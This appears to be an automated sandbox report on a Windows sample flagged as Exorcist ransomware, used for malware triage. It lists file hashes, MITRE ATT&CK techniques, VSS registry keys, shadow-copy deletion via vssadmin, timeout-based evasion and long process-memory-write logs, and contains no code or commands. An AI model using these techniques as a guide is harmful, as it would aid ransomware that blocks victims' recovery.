exorcist | a7e27cc38a39ff242da39d05e04b95ea9b656829dfe2e90e8226351da8813d7d

Analysis

max time kernel
128s
max time network
111s
platform
windows7_x64
resource
win7v200722
submitted
24/07/2020, 12:53 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7e415d5a1b1235491cb698eb14817d31.exe
Size

43KB
MD5

7e415d5a1b1235491cb698eb14817d31
SHA1

ca1a94c1be4e51da577e51957428263ca9c0c0ab
SHA256

a7e27cc38a39ff242da39d05e04b95ea9b656829dfe2e90e8226351da8813d7d
SHA512

6c97b54c6b9d7e82f9be371773ffdafa2fbd59b967d4597e737f3b4249215c662403d3f0f8e3527c129334105ff4ce46397b1aed8d4f4ff49a8032b50bc01303

Score

10^/10

ransomware exorcist persistence

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 356 IoCs

pid	Process
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe
1080	7e415d5a1b1235491cb698eb14817d31.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1784	vssadmin.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
844	timeout.exe

Suspicious use of WriteProcessMemory 740 IoCs

description	pid	Process	procid_target
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	25
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	25
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	25
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	25
PID 1452 wrote to memory of 1592	1452	cmd.exe	27
PID 1452 wrote to memory of 1592	1452	cmd.exe	27
PID 1452 wrote to memory of 1592	1452	cmd.exe	27
PID 1452 wrote to memory of 1592	1452	cmd.exe	27
PID 1080 wrote to memory of 1520	1080	7e415d5a1b1235491cb698eb14817d31.exe	30
PID 1080 wrote to memory of 1520	1080	7e415d5a1b1235491cb698eb14817d31.exe	30
PID 1080 wrote to memory of 1520	1080	7e415d5a1b1235491cb698eb14817d31.exe	30
PID 1080 wrote to memory of 1520	1080	7e415d5a1b1235491cb698eb14817d31.exe	30
PID 1080 wrote to memory of 1788	1080	7e415d5a1b1235491cb698eb14817d31.exe	32
PID 1080 wrote to memory of 1788	1080	7e415d5a1b1235491cb698eb14817d31.exe	32
PID 1080 wrote to memory of 1788	1080	7e415d5a1b1235491cb698eb14817d31.exe	32
PID 1080 wrote to memory of 1788	1080	7e415d5a1b1235491cb698eb14817d31.exe	32
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	34
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	34
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	34
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	34
PID 1080 wrote to memory of 1840	1080	7e415d5a1b1235491cb698eb14817d31.exe	36
PID 1080 wrote to memory of 1840	1080	7e415d5a1b1235491cb698eb14817d31.exe	36
PID 1080 wrote to memory of 1840	1080	7e415d5a1b1235491cb698eb14817d31.exe	36
PID 1080 wrote to memory of 1840	1080	7e415d5a1b1235491cb698eb14817d31.exe	36
PID 1080 wrote to memory of 1848	1080	7e415d5a1b1235491cb698eb14817d31.exe	38
PID 1080 wrote to memory of 1848	1080	7e415d5a1b1235491cb698eb14817d31.exe	38
PID 1080 wrote to memory of 1848	1080	7e415d5a1b1235491cb698eb14817d31.exe	38
PID 1080 wrote to memory of 1848	1080	7e415d5a1b1235491cb698eb14817d31.exe	38
PID 1848 wrote to memory of 1784	1848	cmd.exe	40
PID 1848 wrote to memory of 1784	1848	cmd.exe	40
PID 1848 wrote to memory of 1784	1848	cmd.exe	40
PID 1848 wrote to memory of 1784	1848	cmd.exe	40
PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	41
PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	41
PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	41
PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	41
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	43
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	43
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	43
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	43
PID 1880 wrote to memory of 1576	1880	cmd.exe	45
PID 1880 wrote to memory of 1576	1880	cmd.exe	45
PID 1880 wrote to memory of 1576	1880	cmd.exe	45
PID 1880 wrote to memory of 1576	1880	cmd.exe	45
PID 1080 wrote to memory of 1924	1080	7e415d5a1b1235491cb698eb14817d31.exe	47
PID 1080 wrote to memory of 1924	1080	7e415d5a1b1235491cb698eb14817d31.exe	47
PID 1080 wrote to memory of 1924	1080	7e415d5a1b1235491cb698eb14817d31.exe	47
PID 1080 wrote to memory of 1924	1080	7e415d5a1b1235491cb698eb14817d31.exe	47
PID 1924 wrote to memory of 1960	1924	cmd.exe	49
PID 1924 wrote to memory of 1960	1924	cmd.exe	49
PID 1924 wrote to memory of 1960	1924	cmd.exe	49
PID 1924 wrote to memory of 1960	1924	cmd.exe	49
PID 1080 wrote to memory of 1976	1080	7e415d5a1b1235491cb698eb14817d31.exe	50
PID 1080 wrote to memory of 1976	1080	7e415d5a1b1235491cb698eb14817d31.exe	50
PID 1080 wrote to memory of 1976	1080	7e415d5a1b1235491cb698eb14817d31.exe	50
PID 1080 wrote to memory of 1976	1080	7e415d5a1b1235491cb698eb14817d31.exe	50
PID 1976 wrote to memory of 1996	1976	cmd.exe	52
PID 1976 wrote to memory of 1996	1976	cmd.exe	52
PID 1976 wrote to memory of 1996	1976	cmd.exe	52
PID 1976 wrote to memory of 1996	1976	cmd.exe	52
PID 1080 wrote to memory of 736	1080	7e415d5a1b1235491cb698eb14817d31.exe	53
PID 1080 wrote to memory of 736	1080	7e415d5a1b1235491cb698eb14817d31.exe	53
PID 1080 wrote to memory of 736	1080	7e415d5a1b1235491cb698eb14817d31.exe	53
PID 1080 wrote to memory of 736	1080	7e415d5a1b1235491cb698eb14817d31.exe	53
PID 736 wrote to memory of 1204	736	cmd.exe	55
PID 736 wrote to memory of 1204	736	cmd.exe	55
PID 736 wrote to memory of 1204	736	cmd.exe	55
PID 736 wrote to memory of 1204	736	cmd.exe	55
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	56
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	56
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	56
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	56
PID 1356 wrote to memory of 1108	1356	cmd.exe	58
PID 1356 wrote to memory of 1108	1356	cmd.exe	58
PID 1356 wrote to memory of 1108	1356	cmd.exe	58
PID 1356 wrote to memory of 1108	1356	cmd.exe	58
PID 1080 wrote to memory of 1288	1080	7e415d5a1b1235491cb698eb14817d31.exe	59
PID 1080 wrote to memory of 1288	1080	7e415d5a1b1235491cb698eb14817d31.exe	59
PID 1080 wrote to memory of 1288	1080	7e415d5a1b1235491cb698eb14817d31.exe	59
PID 1080 wrote to memory of 1288	1080	7e415d5a1b1235491cb698eb14817d31.exe	59
PID 1288 wrote to memory of 1500	1288	cmd.exe	61
PID 1288 wrote to memory of 1500	1288	cmd.exe	61
PID 1288 wrote to memory of 1500	1288	cmd.exe	61
PID 1288 wrote to memory of 1500	1288	cmd.exe	61
PID 1080 wrote to memory of 1528	1080	7e415d5a1b1235491cb698eb14817d31.exe	62
PID 1080 wrote to memory of 1528	1080	7e415d5a1b1235491cb698eb14817d31.exe	62
PID 1080 wrote to memory of 1528	1080	7e415d5a1b1235491cb698eb14817d31.exe	62
PID 1080 wrote to memory of 1528	1080	7e415d5a1b1235491cb698eb14817d31.exe	62
PID 1528 wrote to memory of 1592	1528	cmd.exe	64
PID 1528 wrote to memory of 1592	1528	cmd.exe	64
PID 1528 wrote to memory of 1592	1528	cmd.exe	64
PID 1528 wrote to memory of 1592	1528	cmd.exe	64
PID 1080 wrote to memory of 1684	1080	7e415d5a1b1235491cb698eb14817d31.exe	65
PID 1080 wrote to memory of 1684	1080	7e415d5a1b1235491cb698eb14817d31.exe	65
PID 1080 wrote to memory of 1684	1080	7e415d5a1b1235491cb698eb14817d31.exe	65
PID 1080 wrote to memory of 1684	1080	7e415d5a1b1235491cb698eb14817d31.exe	65
PID 1684 wrote to memory of 1340	1684	cmd.exe	67
PID 1684 wrote to memory of 1340	1684	cmd.exe	67
PID 1684 wrote to memory of 1340	1684	cmd.exe	67
PID 1684 wrote to memory of 1340	1684	cmd.exe	67
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	68
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	68
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	68
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	68
PID 1336 wrote to memory of 1844	1336	cmd.exe	70
PID 1336 wrote to memory of 1844	1336	cmd.exe	70
PID 1336 wrote to memory of 1844	1336	cmd.exe	70
PID 1336 wrote to memory of 1844	1336	cmd.exe	70
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	71
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	71
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	71
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	71
